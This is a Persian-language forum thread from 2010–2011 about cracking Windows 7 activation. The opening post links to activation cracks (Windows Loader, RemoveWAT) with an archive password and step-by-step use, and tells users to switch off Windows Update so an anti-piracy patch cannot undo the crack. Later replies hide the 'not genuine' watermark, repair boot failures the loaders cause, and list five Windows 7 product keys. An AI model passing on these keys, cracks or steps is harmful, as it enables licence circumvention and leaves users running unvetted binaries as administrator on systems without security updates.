PDA

نسخه کامل مشاهده نسخه کامل : فعال سازی و قانونی کردن ویندوزSeven 7 "کرک ها و توضیحات در پست اول"▒▒ تمامی مسائل در این تاپیک ▒▒

صفحه ها : [1] 2 3 4 5 6

Mohammad King
25-11-2010, 15:40
با توجه به این که برای استفاده از تمامی قابلیت های ویندوز 7 نیاز به نصب کرک و انواعی از فایل های Patch بوده تا بتوان از این سیستم عامل برای مدت طولانی استفاده کرد امکان از کار افتادن کرک ها قبلی نیز وجود دارد. به همین دلیل کاربرانی که این سیستم عامل فوق موفق را برگزیده اند می بایست در صورت از کار افتادن کرک ها و از بین رفتن License ها نسخه های جدیدی از کرک ها را دریافت کرده و برای فعالسازی سیستم عامل اقدام کنند.
با توجه به درخواست های مکرر کاربران مبنی بر از بین رفتن License فعالسازی برآن شدیم تا تعدادی از کرک های جدید و تست شده را برای دانلود قرار دهیم ، دقت داشته باشید که هریک از این نرم افزارها به صورت جداگانه در هاست قرار داده شده اند و می توانید پس از دریافت هریک از آن ها ابتدا لایسنس قبلی را Uninstall نموده و سپس کرک جدید را اعمال کنید.

دوستان سوالات خودشون را در این زمینه توی این تاپیک سوال کنند.
================================================== ================================================== =========
خب لازم دونستم این مطلب رو هم قرار بدم:

آپدیت kb971033 باعث از کار افتادن ویندوز ۷ می شود

مایکروسافت هر چند وقت یکبار، بعد از عرضه نسخه های جدید ویندوز خود، برای شناسایی و از کار انداختن نسخه هایی از ویندوزکه به طور غیر قانونی اکتیو شده اند و به طور رسمی از مایکروسافت خریداری نشده اند، آپدیتهایی را برروی مرکز آپدیت خود قرار می دهد که دریافت و نصب آنها بر برروی سیستم، در صورتی که ویندوز به طور قانونی تهیه نشده باشد، باعث غیر فعال شدن ویندوز می شود.

با توجه به اینکه بسیاری از کاربران بخش Windows Update را در کنترل پنل ویندوز برروی اتوماتیک قرار می دهند، لذا به هنگام اتصال به اینترنت، آخرین آپدیتها از سرور مایکروسافت دریافت و بدون اطلاع کاربر برروی ویندوز نصب می شود که در صورتی که آپدیت موردنظر هم در میان آنها باشد باعث از کار افتادن ویندوز خواهد شد.

اکنون نیز که چند ماه از عرضه ویندوز ۷ گذشته است مایکروسافت آپدیت جدیدی تحت عنوان KB971033 عرضه کرده است که با نصب آن برروی سیستم ممکن است اکتیویشن ویندوز از کار بیفتد و ویندوز حالت Geniune را از دست بدهد.

راه حلها :

آپدیت KB971033 هنوز نصب نشده است :

۱-بهترین راه حل این است که در Control Panel > Windows Update در منوی سمت چپ برروی Change setting کلیک نمایید و گزینه Install update automatically (recommended) را برروی Check for updates but let me choose whether to Download and install them. تنظیم نمایید.این گزینه باعث می شود ویندوز برای دریافت و نصب آپدیتها از شما اجازه بگیرد و شما می توانید انتخاب نمایید کدام یک از آپدیتها را نصب نمایید و کدام یک را نصب ننمایید.

هر چند توصیه ما این است که این گزینه را به طور کل برروی Never check for updates تنظیم نمایید تا اصولا آپدیتهای ویندوز نصب نشود.

۲-بعد از اینکه ویندوز به سایت مایکروسافت متصل شد و لیست آپدیتها را به شما نشان داد تیک جلوی اپدیت شماره KB971033 را بردارید تا نصب نشود.

آپدیت KB971033 نصب شده ولی ویندوز هنوز از کار نیفتاده است :

شما آدم خوش شانسی هستید ولی ممکن است تا یکی دوروز آینده اکتیویشن از کار بیفتد که در این صورت از روش مرحله بعد استفاده نمایید.

آپدیت KB971033 نصب شده و ویندوز از کار افتاده است :

این بدترین اتفاق ممکن است ولی از فایل ضمیمه شده زیر فایل RemoveWAT را دانلود نمایید و آنرا اجرا نمایید و دکمه RemoveWat را بزنید تا این مشکل حل شود.
برای از بین بردن آپدیت غیر فعال کننده ی ویندوز7:»»
Remove Wat:دوستانی که بعد از آپدیت ویندوز 7 ویندوزشون غیر فعال شده از این برنامه استفاده کنند:

RemoveWATv2.2.6.0.zip ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

================================================== =========================================
دانلود پچ اکتیو سایز ویندوز7:»»

دقت داشته باشید که 3 کرک از یک شرکت هستند فقط کرکهای آخر جدید تر هست. می توانید تنظیمات مختلف را در کرک کردن اعمال کنید. براي استفاده از كرك جديد حتما با استفاده از كرك قبلي اقدام به حذف كردن كرك نماييد و سپس كرك جديد را نصب نماييد.

قابليت قعالسازي و پشتيباني از ويندوزهاي:
Windows 7 Ultimate
Windows 7 Professional
Windows 7 Home Premium
Windows 7 Home Basic
Windows 7 Starter
Windows Vista Ultimate
Windows Vista Business
Windows Vista Business N
Windows Vista Home Premium
Windows Vista Home Basic
Windows Vista Starter
Windows Server 2008 R2: Enterprise
Windows Server 2008 R2: Standard
Windows Server 2008 R2: Foundation
Windows Server 2008: Enterprise
Windows Server 2008: Standard
Windows Server 2008: Foundation
Windows Small Business Server 2008

طریقه استفاده: کرک را دانلود کنید سپس پس از دانلود با کیک راست روی کرک و گزینه Run As Admin اجراش کنید سپس وقتی کرک اجرا شد 2 گزینه به نام های Install و Uninstall وجود داره ابتدا گزینه ی Uninstall را زده .....صبر کنید پیغامی مبنی بر Restart کامپیوتر ظاهر شود سپس کامپیوتر Restart میشود سپس دوباره پس از بالا اومدن کامپیوتر کرک را اجرا کنید و گزینه Install را بزنید صبر کنید پیغامی مبنی بر Restart کامپیتر ظاهر شود سپس کامپیوتر Restart میشود و پس از بالا اومدن کامپیوتر ویندوز شما اکتیو شده است.

***نکته***:2 کرکی که پیوست شده مال یک شرکت هستند . میتوانید از هر کدام که خواستید استفاده کنید.نسخه هر کرک نوشته شده.

توجه داشته باشید بعد از استفاده از هر کرک میبیاست حتمان Uninestall کنید کرک قبل را گرینه Uninestall توی هر ورژن از کرک ها هست.
/
پسورد: p30world

آپدیت شد...

آخرین ورژن کرکها:

کرک اول جدید تر هست.

saeed774
28-11-2010, 20:09
مرسی دوست عزیز
ویندوز 7 ورژن 32بیتی رو نصب کردم و بعدش SP1 رو نصب کردم با لودری که قرار دادین ویندوز اکتیو شده ولی نمیدونم چرا تو دسکتاپ سمت راست پایین نوشته زیر میاد : راهی برای حذف کردنش هست ؟

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

meshkiposh2200
28-11-2010, 23:34
ممنون فقط اگه نحوه ی استفادش را هم بنویسید عالی میشه

رضاکلاته
28-11-2010, 23:58
ویندوز7 رو چطوری میشه به حالت safe modeدرآورد؟ تو xpهنگام ریست f6رومیزدم جواب میداد ولی تو7 جواب نمیده.

Dew Drop
29-11-2010, 00:07
مرسی دوست عزیز
ویندوز 7 ورژن 32بیتی رو نصب کردم و بعدش SP1 رو نصب کردم با لودری که قرار دادین ویندوز اکتیو شده ولی نمیدونم چرا تو دسکتاپ سمت راست پایین نوشته زیر میاد : راهی برای حذف کردنش هست ؟

سلام
این مسیر رو تو رجیستری برید

HKEY_CURRENT_USER\Control Panel\Desktop

رو کلید desktop کلیک کنید تو صفحه راست کلید PaintDesktopVersion
رو پیدا کنید و بازش کنید.تو قسمت valu date بنویسید 0 و ok کنید.

اگه این روش جواب نداد از این استفاده کنید.

windows 7 sp1 watermark remover

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

---------- Post added at 12:07 AM ---------- Previous post was at 12:04 AM ----------

ویندوز7 رو چطوری میشه به حالت safe modeدرآورد؟ تو xpهنگام ریست f6رومیزدم جواب میداد ولی تو7 جواب نمیده

باید کلید F8 رو بزنید.

meshkiposh2200
29-11-2010, 01:02

جواب من را هم بدبد ممنون میشم دقیقا کدوم قسمتش را اجرا کنم روی لودر میزنم هیچ اتفاقی نمی افته اون نام برندها واسه چیه؟

ANAMORPH
29-11-2010, 12:50
ویندوز7 رو چطوری میشه به حالت safe modeدرآورد؟ تو xpهنگام ریست f6رومیزدم جواب میداد ولی تو7 جواب نمیده.
F8 رو بزنید

ANAMORPH
29-11-2010, 13:33
با استفاده از این فعال ساز به راحتی میتوانید win 7 خود را بدون هیچ مشکلی اکتیو کنید. برای 32 بیت و 64 بیت فرقی نمیکنه

طرز استفاده :

1) Activator را از آدرس زیر که براتون آپلود کردم دانلود کنین
size : 3.06 MB

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید2) روی یکی از آیکونهای قسمت Install OEM Information کلیک کنید

3) روی Install 7Loader کلیک کنید و صبر کنید خود ویندوز Restart شود

ANAMORPH
29-11-2010, 13:52
مرسی دوست عزیز

دوست من شما این فایل رو دانلود و اجرا کن
بعد از اکسترا روش راست کلیک و Run as administrator رو انتخاب کن
498.32 KB

saeed774
29-11-2010, 15:11
دوست من شما این فایل رو دانلود و اجرا کن
بعد از اکسترا روش راست کلیک و Run as administrator رو انتخاب کن
498.32 KB

مرسی دوستان عزیز ، بخوبی جواب داد . البته از روش نرم افزاری استفاده کردم . :46:

Mohammad King
29-11-2010, 15:16

دوست من خیلی سادست شما پچ را دانلود میکنید بعد که دانلود شد روش کلیک راست میکنید بعد گزینه run as admin را میزنی و بعد بقیه کار.

شما این کارو انجام بدین به مشکلی خوردین سوال کنید.

arfnpm
01-12-2010, 12:21
درود
من ویندوز 64 بیتی روی لپ تابم دارم. آخرین آپدیت هاشو نصب کردم که غیر قانونی شد. حالا از هر لودری استفاده می کنم هیچ تغیری نمی کنه.
موقع بالا آمدن ویندوز هشدار میده و میگه الان رسیدگی بشه یا بعدا، بعدا رو میزنم یک صفحه متن راهنمای قانونی شدن میاد.

فکر می کنم شاید لودر ها برای آپدیت های جدید کار ساز نیست.
لطفا راهنمایی کنید.

سپاس

Dew Drop
01-12-2010, 12:47
درود
من ویندوز 64 بیتی روی لپ تابم دارم. آخرین آپدیت هاشو نصب کردم که غیر قانونی شد. حالا از هر لودری استفاده می کنم هیچ تغیری نمی کنه.
موقع بالا آمدن ویندوز هشدار میده و میگه الان رسیدگی بشه یا بعدا، بعدا رو میزنم یک صفحه متن راهنمای قانونی شدن میاد.

فکر می کنم شاید لودر ها برای آپدیت های جدید کار ساز نیست.
لطفا راهنمایی کنید.

سپاس

سلام
از Remove wat استفاده کنین,شاید مشکلتون حل شد...

در ضمن ویندوز ارجینال لپ تاپ بود؟

teshneh
01-12-2010, 13:58
سلام
من فایلی که در پست ی داده بودید ،دانلود و اجرا کردم ولی هنوز مشکل باقی است و پیغام نات جنیوس میدهد.
عکس پیغام رو براتون میذارم،ممنون میشم راهنمایی کنید.

Dew Drop
01-12-2010, 15:46
سلام
من فایلی که در پست ی داده بودید ،دانلود و اجرا کردم ولی هنوز مشکل باقی است و پیغام نات جنیوس میدهد.
عکس پیغام رو براتون میذارم،ممنون میشم راهنمایی کنید.

سلام
پست یک منظورتون بود؟
از پست قبلی تون استفاده کنید یا جدیدترین لودر رو امتحان کنید,ببینید درست میشه.

teshneh
01-12-2010, 18:15
سلام
پست یک منظورتون بود؟
از پست قبلی تون استفاده کنید یا جدیدترین لودر رو امتحان کنید,ببینید درست میشه.

اره،منظوورم پست یک بود.
با راهنمایی تون مشکلم حل شد،واقعا متشکرم.کمک بزرگی کردید.:11:

M3HRD@D
02-12-2010, 11:48
دوستان من یه مشکلی دارم موقعی که میخوام فیلم ببینم با پاور دی وی دی یه پنجره دیگه ای باز میشه و بالاش میزنه active movie window و نمیشه فیلم رو دید چه کار کنم؟
عکسش رو هم گرفتم

Mohammad King
02-12-2010, 12:15
دوستان من یه مشکلی دارم موقعی که میخوام فیلم ببینم با پاور دی وی دی یه پنجره دیگه ای باز میشه و بالاش میزنه active movie window و نمیشه فیلم رو دید چه کار کنم؟
عکسش رو هم گرفتم

شما اینجا تاپیک زدین نباید اینجا سوال میکردین؟!!!

توی همون تاپیک خودتون ادامه بدید
مشکل با پخش فیلم در ویندوز سون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

mohammad_s7201
06-12-2010, 08:45
سلام. من ديروز ويندوز Windows 7 Enterprise x86 Integrated October 2010-BIE رو نصب كردم.
ولي نتونستم اكتيوش كنم. از دو تا ويندوز لودر استفاده كردم ولي هيچكدوم كار نميكنن. عكسشون رو هم پايين گذاشتم

اولي كه گزينه اينستال اصلا فعال نميشه

دومي هم كه همش ارور ميده و كاري نميكنه

Mohammad King
06-12-2010, 09:35
سلام. من ديروز ويندوز Windows 7 Enterprise x86 Integrated October 2010-BIE رو نصب كردم.
ولي نتونستم اكتيوش كنم. از دو تا ويندوز لودر استفاده كردم ولي هيچكدوم كار نميكنن. عكسشون رو هم پايين گذاشتم

اولي كه گزينه اينستال اصلا فعال نميشه

دومي هم كه همش ارور ميده و كاري نميكنه

سلام

از اکتیوتور پست شماره 1 استفاده کنید و طبق راهنمایی های عمل کنید.

mohammad_s7201
06-12-2010, 18:27
سلام

از اکتیوتور پست شماره 1 استفاده کنید و طبق راهنمایی های عمل کنید.

اینم همون ارور رو داد.

tak2750
06-12-2010, 20:58
من تازه ویندوز سون رو روی لب تاب نصب کردم.وقتی برنامه
Windows Loader v1.9.5
اجرا میکنم این ارور رو میده
و میگه که نمیتو نه درایو اکتیو سیستم رو شناسایی کنه

tak2750
06-12-2010, 21:19
از کرک صفحه اول استفاده کردم
گزینه certificate رو زدم
مشگلم حل شد

Mohammad King
07-12-2010, 10:30
اینم همون ارور رو داد.

از گزینه run as admin استفاده میکنید؟

mohammad_s7201
07-12-2010, 14:33
از گزینه run as admin استفاده میکنید؟

آره استفاده ميكنم.
يه ويندوز ديگه نصب كردم و درست شد. شايد چون اوني كه دانلود كردم جديدترين آپديت بوده اينا روش جواب نميدن.

ممنونم:11:

Mohammad King
07-12-2010, 15:02
آره استفاده ميكنم.
يه ويندوز ديگه نصب كردم و درست شد. شايد چون اوني كه دانلود كردم جديدترين آپديت بوده اينا روش جواب نميدن.

ممنونم:11:
سلام

این یکی هم خوب بود استفاده میکردین:
برای رفع مشکل آپدیت هست

shahabprince
08-12-2010, 13:39
ا
اینم از جدیدترین کرک ساخته شده برای جنیون کردن واقعی ویندوز:
Windows Loader 1.9.5 by Daz

omid_egh
08-12-2010, 22:52
من واقعا شرمندم که این سوالو اینجا میپرسم

اول باید بگم مشکل من با انجام این کار حل شد و خیلی ممنونم اما سوال من در مورد ویندوز xp هستش اونو چه جوری درستش کنم ؟

robert24
09-12-2010, 00:24
سلام ، من هنوز نميدونم چه فرقي بين ويندوز سون کرک شده با کرک نشده وجود داره؟من الآن دوماهه ويندوز سون ultimate رو سيستمم نصبه و هيچ مشکلي براش به وجود نيومده ، تازه وقتي ويندوز سون رو کرک ميکني هيچ فرقي نميکنه و هيچ امکانات خاصي بهش اضافه نميشه.در کل ميخواستم بدونم اين کرک به چه کاري مياد که همه دنبالشن

Mohammad King
09-12-2010, 16:47
من واقعا شرمندم که این سوالو اینجا میپرسم

اول باید بگم مشکل من با انجام این کار حل شد و خیلی ممنونم اما سوال من در مورد ویندوز xp هستش اونو چه جوری درستش کنم ؟
سلام اینجا سوال کنید: بررسی سوالات و رفع مشکلات و نکات سیستم عامل ویندوز ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 1 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) 2 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) 3 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) 4 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) 5 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) ... آخرين صفحه ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]))

سلام ، من هنوز نميدونم چه فرقي بين ويندوز سون کرک شده با کرک نشده وجود داره؟من الآن دوماهه ويندوز سون ultimate رو سيستمم نصبه و هيچ مشکلي براش به وجود نيومده ، تازه وقتي ويندوز سون رو کرک ميکني هيچ فرقي نميکنه و هيچ امکانات خاصي بهش اضافه نميشه.در کل ميخواستم بدونم اين کرک به چه کاري مياد که همه دنبالشن
اگر کرک نکنید آپدیت نمیشه کرد ویندوزتون بعد ا مدتی به مشکل میرسه شما احتما لن ویندوزت جنیون هست اگر نه تا حالا غیر فعال شده بود

golbehi
10-12-2010, 00:57
ا
اینم از جدیدترین کرک ساخته شده برای جنیون کردن واقعی ویندوز:
Windows Loader 1.9.5 by Daz

سلام دوستان من از این کرک استفاده کردم ارور داد:

spaceman_ir
10-12-2010, 11:35
سلام من تازه عضو این فروم شدم یعنی عضو بودم اما پسوردم یادم رفت
دوستان من یه سوال دارم من هیچ کرکی رو نمی تونم واسه نوت بوکم پیدا کنم نوت بوکم اسوس ان 61 وی ان هستش مشکلشم اینه همین که لودر رو اجرا می کنم و وینوز که رستارت می شه وقتی که بالا می یاد ویندو یه ارور قرمز بزرگ نوشته می شه که دیگه هیچ کاری نمی شه کرد الان تنها ویندوزی که روی سیستم من خوب اجرا می شه ویندوز 7 شرکت ام آر تی هستش اونم نه نسخه اصلی ویندوز نسخه پلاس که خودش اکتیو می کنه و یه آیکن اکتیو هم بعد این که ویندوز بالا اومد روی دسک تاپ می مونه که اگه اکتیو نشد از اونجا اکتیو کنم اما اکتیو می شه ممنون اگه راهنمایی کنید

Mohammad King
10-12-2010, 11:53

از کرک پست اول استفاده کردین؟

اگر اره مشخصات ویندوزتون را بدید

سلام من تازه عضو این فروم شدم یعنی عضو بودم اما پسوردم یادم رفت
دوستان من یه سوال دارم من هیچ کرکی رو نمی تونم واسه نوت بوکم پیدا کنم نوت بوکم اسوس ان 61 وی ان هستش مشکلشم اینه همین که لودر رو اجرا می کنم و وینوز که رستارت می شه وقتی که بالا می یاد ویندو یه ارور قرمز بزرگ نوشته می شه که دیگه هیچ کاری نمی شه کرد الان تنها ویندوزی که روی سیستم من خوب اجرا می شه ویندوز 7 شرکت ام آر تی هستش اونم نه نسخه اصلی ویندوز نسخه پلاس که خودش اکتیو می کنه و یه آیکن اکتیو هم بعد این که ویندوز بالا اومد روی دسک تاپ می مونه که اگه اکتیو نشد از اونجا اکتیو کنم اما اکتیو می شه ممنون اگه راهنمایی کنید
اینجا سوال کنید:
سوالات و اشکال های سخت افزاری و نرم افزاری ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

golbehi
10-12-2010, 12:17
سلام از همه ی کرکهای این تاپیک استفاده کردم و نشد...
ویندوز7 ultimate
32 بیت

Mohammad King
10-12-2010, 15:24
سلام از همه ی کرکهای این تاپیک استفاده کردم و نشد...
ویندوز7 ultimate
32 بیت
ویندوزتون را آپدیت نکردین؟اگر اره از این هم استفاده کنید:

shahabprince
10-12-2010, 16:38

دوست عزیز این کرک 100 % کار میکنه و یرای سایت سافتگذر هست.
شما روی کرک راست کلیک بکنید بعد گزینه ی run as administrator را بزنید و اگر کرک دیگری روی ویندوز نصب کرده اید اون رو پاک کنید و بعد از ریستارت سیستم این کرک رو دوباره امتحان کنید:

majid_cat
15-12-2010, 11:46
سلام دوستان.من ویندوزم رو کرک می کنم و تو کنترل پنل گزینه Never Check fo updates رو می زنم اما بعد از 1 مدتی می بینم پیغام not activated میاد! می رم تو کنترل پنل می بینم که تنظیمات آپدیت عوض شده!و روی Never Check fo updates نیست!من نمی خوام واسه آپدیت چک کنه و همینطوری اکتیو بمونه.چی کار کنم؟
قبلا یه نسخه دیگه از ویندوز 7 نصب کرده بودم این مشکل رو نداشت.کاش همونو نصب می کردم

Shayan Arya
15-12-2010, 21:13
من شنیدم بعضی ها ویندوزشون رو با سریال های موجود در اینترنت نصب و بعد قانونی کردن
لطفا اگر سریال برای Windows 7 Ultimate x64 سراغ دارید که هنوز کار میکنه اینجا بنویسید

varians
16-12-2010, 14:02
سلام
ویندوز من Windows 7 Ultimate N هستش. (سری n برای کشورهای اروپاییه و فرقش اینه که فقط مدیا پلیر نداره).
من چجوری کرکش کنم ؟ کرک windows 7 Loader By Daz ver 1.9.5 گرفتم که آخرین ورژنه اما سری N رو ساپورت نمیکنه میگه : Unsupported Windows information ؟؟

Mohammad King
17-12-2010, 19:20
من شنیدم بعضی ها ویندوزشون رو با سریال های موجود در اینترنت نصب و بعد قانونی کردن
لطفا اگر سریال برای Windows 7 Ultimate x64 سراغ دارید که هنوز کار میکنه اینجا بنویسید

این سریالها را امتحان کنید:
jydv8-h8vxg-74rpt-6bjpb-x42v4
482xp-6j9wr-4jxt3-vbpp6-fqf4m
7xrcq-rpy28-yy9p8-r6hd8-84gh3
d9rhv-jg8xc-c77h2-3yf6d-ryrj9
rfftv-j6k7w-mhbqj-xymmj-q8dch

varians
17-12-2010, 21:07
نشد . من هر چی سریال تو اینترنت بود امتحان کردم قبلا. هیچی نشد. آخه چرا کرک سون N رو ساپورت نمیکنه یعنی چی

Shayan Arya
18-12-2010, 02:25

خیلی ممنون، در اولین فرصت ویندوز رو با این سریال ها نصب میکنم.
فقط اگر بعد از نصب و ارتباط با اینترنت برای تایید مایکروسافت سریال غیرفعال بشه امکانش هست در همون ویندوز سریال رو تغییر بدم و سریال بعدی رو تست کنم؟

ferdfe
19-12-2010, 21:11
دوستان این نسخه نهایی که اومده و از جمله همین پی سی می فروشه با اکتیو
ا یا اکتیو یا سریال جدید هم می خواد یا نه !!!
الان تو قسمت اپدیت ویندوز سه تا اپدیت می خواد چکار کنم !!

بعدش این ویندوز مثل قبلی ها نباید کارت صدا یا گرافیک نصب کنیم !!!

aliupdate
19-12-2010, 21:24
دوستان این نسخه نهایی که اومده و از جمله همین پی سی می فروشه با اکتیو
ا یا اکتیو یا سریال جدید هم می خواد یا نه !!!
الان تو قسمت اپدیت ویندوز سه تا اپدیت می خواد چکار کنم !!

اگر اپدیت KB971033 رو نصب نکنید نیازی به اکتیو کردن دوباره نداره.به غیر از اون اپدیت بقیه ی اپدیت ها مشکل ندارند و میتونید اون ها رو دانلود کنید.

ferdfe
19-12-2010, 21:38
اگر اپدیت KB971033 رو نصب نکنید نیازی به اکتیو کردن دوباره نداره.به غیر از اون اپدیت بقیه ی اپدیت ها مشکل ندارند و میتونید اون ها رو دانلود کنید.

خوب از کجا بفهم که این اپدیت ؟

پ ن : وای الان که اون سه تا رو اینستال کردم توش همین اپدیت KB971033 بود بعد از تمام شدن گزینه ری استارت هم اومده باید چیکار کنم !!!!!!!!!!!!!!!!!!!!

aliupdate
19-12-2010, 21:47
خوب از کجا بفهم که این اپدیت ؟

پ ن : وای الان که اون سه تا رو اینستال کردم توش همین اپدیت KB971033 بود بعد از تمام شدن گزینه ری استارت هم اومده باید چیکار کنم !!!!!!!!!!!!!!!!!!!!
باید ببینید ویندوز از حالت اکتیو در اومده یا نه اگر اکتیو بود که هیچ اگر نبود بایید با کرک پست اول کرکش کنید.

babialex
23-12-2010, 01:30
کرک خوب و درست حسابی برای ویندوز Windows 7 Enterprise x86 Integrated December 2010 میخواستم

ممنون :11:

Mohammad King
23-12-2010, 14:11
کرک خوب و درست حسابی برای ویندوز Windows 7 Enterprise x86 Integrated December 2010 میخواستم

ممنون :11:
سلام

از کرک پست 1 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) استفاده کردین؟

omidlord
23-12-2010, 23:52
سلام

من وقتی داشتم ویندوز نصب می کردم سریال رو از تو نرم افزار Windows 7 Loader v1.9.5 کپی کردم و بصورت دستی وارد کردم

مشکلی نداشت و جنیون بود تا چند روز پیش که از اکتیو در اومد آپدیت هم اصلاً نکردماز همون اول تیک رو برداشتم ...

الان موقع نصب Windows 7 Loader v1.9.5 خطا میده و نصب نمی شه ... راه حلی داره ؟!

البته سریالی که واسه جنیون تواین ورژن گذاشته هم همون قبلی که قبلاً دستی وارد کردم ...!

omidlord
24-12-2010, 17:23
کسی راه حلی نداره ؟!

Mohammad King
25-12-2010, 09:47
کسی راه حلی نداره ؟!

سلام

کرک پست 1 را دانلود کنید بعد گزینه unistall را بزنید بهد ریست کنید بعد دوباره گزینه install را بزنید بعد ریست کنید ایشالله که رفع شده

mohammad.t
25-12-2010, 20:18
2 تا سوال داشتم در مورد فعال سازي ويندوز7
من لودر رو قبل از هر كاري نصب كردم
1- توي نصب لودر انتخاب مدل اهميت داره؟ من dell رو انتخاب كردم
2- تا اومدم به خودم بيام كه تيك آپديت ها رو چك كنم اين آپديت KB971033 نصب شد رفت!
حالا مي خوام بدونم مشكلي كه پيش نمياد الان حدود 48 ساعت هست اين آپديت انجام شده گفتم اگه واكسني،نوشدارويي! چيزي تجويز مي كنيد بديد مصرف كنم!

sedaghatpour
25-12-2010, 22:08
2 تا سوال داشتم در مورد فعال سازي ويندوز7
من لودر رو قبل از هر كاري نصب كردم
1- توي نصب لودر انتخاب مدل اهميت داره؟ من dell رو انتخاب كردم
2- تا اومدم به خودم بيام كه تيك آپديت ها رو چك كنم اين آپديت KB971033 نصب شد رفت!
حالا مي خوام بدونم مشكلي كه پيش نمياد الان حدود 48 ساعت هست اين آپديت انجام شده گفتم اگه واكسني،نوشدارويي! چيزي تجويز مي كنيد بديد مصرف كنم!

سلام
در مورد سوال اولت بگم که نه،اصلا اهمیت نداره.در حقیقت اینکار جنبه زیبایی داره.
در مورد سوال دومت هم اینکه تا زمانی که ویندوزت اکتیو هست هیچ نگرانی نداشته باش.من خودم شخصا اون آپدیت کذایی رو نصب کردم و هیچ مشکلی هم ندارم.
موفق باشی

niki2934
27-12-2010, 09:24
سلام
من هردو تا لودر رو دانلود و اجرا کردم ولی ارور نات ساپورت میده چیکار کنم؟

Mohammad King
28-12-2010, 20:10
سلام
من هردو تا لودر رو دانلود و اجرا کردم ولی ارور نات ساپورت میده چیکار کنم؟

سلام

از اینها استفاده کنید:

دقت کنید باید اول کرک قبلی را آنیستال کنید

saeed-guitar
29-12-2010, 16:23
سلام بچه ها
من بعد نصب کارت گرافیک نوار پایین taskbar از حالت شیشه ای دراومده و مات شده! از قسمت Aero Themes هم هرکاری میکنم درست نمیشه!
چیکارش کنم؟

LiveTime
29-12-2010, 17:37
من هرباری که remove wat میکنم، وقتی سیستم بعد از ریستارت بالا میاد و مجدد برنامه remove wat رو باز میکنم میبینم که باز پیغام remove wat فعاله.
ضمنا هربار که uninstall crack رو میزنم، این پیغام میاد:

چیکار کنم؟

Masоud
30-12-2010, 00:52
سلام بچه ها
من بعد نصب کارت گرافیک نوار پایین taskbar از حالت شیشه ای دراومده و مات شده! از قسمت Aero Themes هم هرکاری میکنم درست نمیشه!
چیکارش کنم؟

سلام

سؤالتون نامرتبط با این تاپیک هست . در اینجا ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) مطرح کنید.

موفق باشید :40:

amir2mahdi
01-01-2011, 08:02
سلام
با چه اکتیویتوری میشه(WINDOWS7ULTIMATE(N اکتیو و کرک نمود ؟؟؟
لطفا راهنمایی کنید.

Mohammad King
01-01-2011, 20:48
سلام
با چه اکتیویتوری میشه(WINDOWS7ULTIMATE(N اکتیو و کرک نمود ؟؟؟
لطفا راهنمایی کنید.

سلام

اگر با پست شماره 1 کرکی که اونجا معرفی کردم نشد از این پست استفاده کند:

#55 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

amir3737
04-01-2011, 23:20
باسلام
من این برنامه اکتیو رو اجرا کردم بعد که سیستم ریست شد دیگه ویندوز بالا نمیاد چیکار کنم

pasargadd
04-01-2011, 23:22
باسلام
من این برنامه اکتیو رو اجرا کردم بعد که سیستم ریست شد دیگه ویندوز بالا نمیاد چیکار کنم
ببینید داخله سیف مود میره.
هنگام بوت شدن f8 بزنید.اگر رفت با همون برنامه انیستال کنین.

alireza fatemi
04-01-2011, 23:28
باسلام

Is Windows failing to boot after you installed the loader? Just do the following.

* Boot up the PC from your Windows installation disk
* Select the "Repair your computer" option
* Select "Command Prompt"
* Input "bootsect.exe /nt60 SYS /force" (without quotes)
* Restart the PC

Mohammad King
05-01-2011, 14:49
باسلام

با ویندوزتون که اکتیو نبود توی اینترنت رفته بودین؟

*Ali*
06-01-2011, 00:05
سلام دوستان
نوع کرکی که توی قانونی کردن ویندوز استفاده میکنیم توی سرعت ویندوز چقدر موثره ؟
چون من الان یه نسخه 64 بیت روی لپ تاپم نصب کردم و از windows loader استفاده نکردم
توی محیط ویندوز زیاد اذیت نمیکنه ولی خیلی دیر بالا میاد نزدیک 3 دقیقه بعد از روشن کردن لپتاپ طول میکشه تا کاملا آماده به کار بشه
حالا میتونم دوباره ویندوز رو غیر قانونی کنم بعد دوباره با ویندوز لودر درستش کنم ؟

Mohammad King
06-01-2011, 00:43
سلام دوستان
نوع کرکی که توی قانونی کردن ویندوز استفاده میکنیم توی سرعت ویندوز چقدر موثره ؟
چون من الان یه نسخه 64 بیت روی لپ تاپم نصب کردم و از windows loader استفاده نکردم
توی محیط ویندوز زیاد اذیت نمیکنه ولی خیلی دیر بالا میاد نزدیک 3 دقیقه بعد از روشن کردن لپتاپ طول میکشه تا کاملا آماده به کار بشه
حالا میتونم دوباره ویندوز رو غیر قانونی کنم بعد دوباره با ویندوز لودر درستش کنم ؟
سلام

علی جان فکر نمیکنم ربطی به سرعت داشته باشه.

ولی لودری که توی پست اول گذاشتم دانلود کنی و اجراش کنی گزینه unistall را داره میتونی کرک قبلو پاک کنی و بعد این کرکو install کنی.

ولی بازم میگم فکر نمیکنم ربطی داشته باشه

farinaaz
07-01-2011, 16:25
سلام من چطور میتونم ویندوز 7 روی لپ تاپ نصب کنم؟
ممنون میشم مراحل نصب رو واسم کپی کنید.
قبلا فقط XP نصب کردم آیا مثل همون باید عمل کنم؟

armin_punisher6
07-01-2011, 20:20
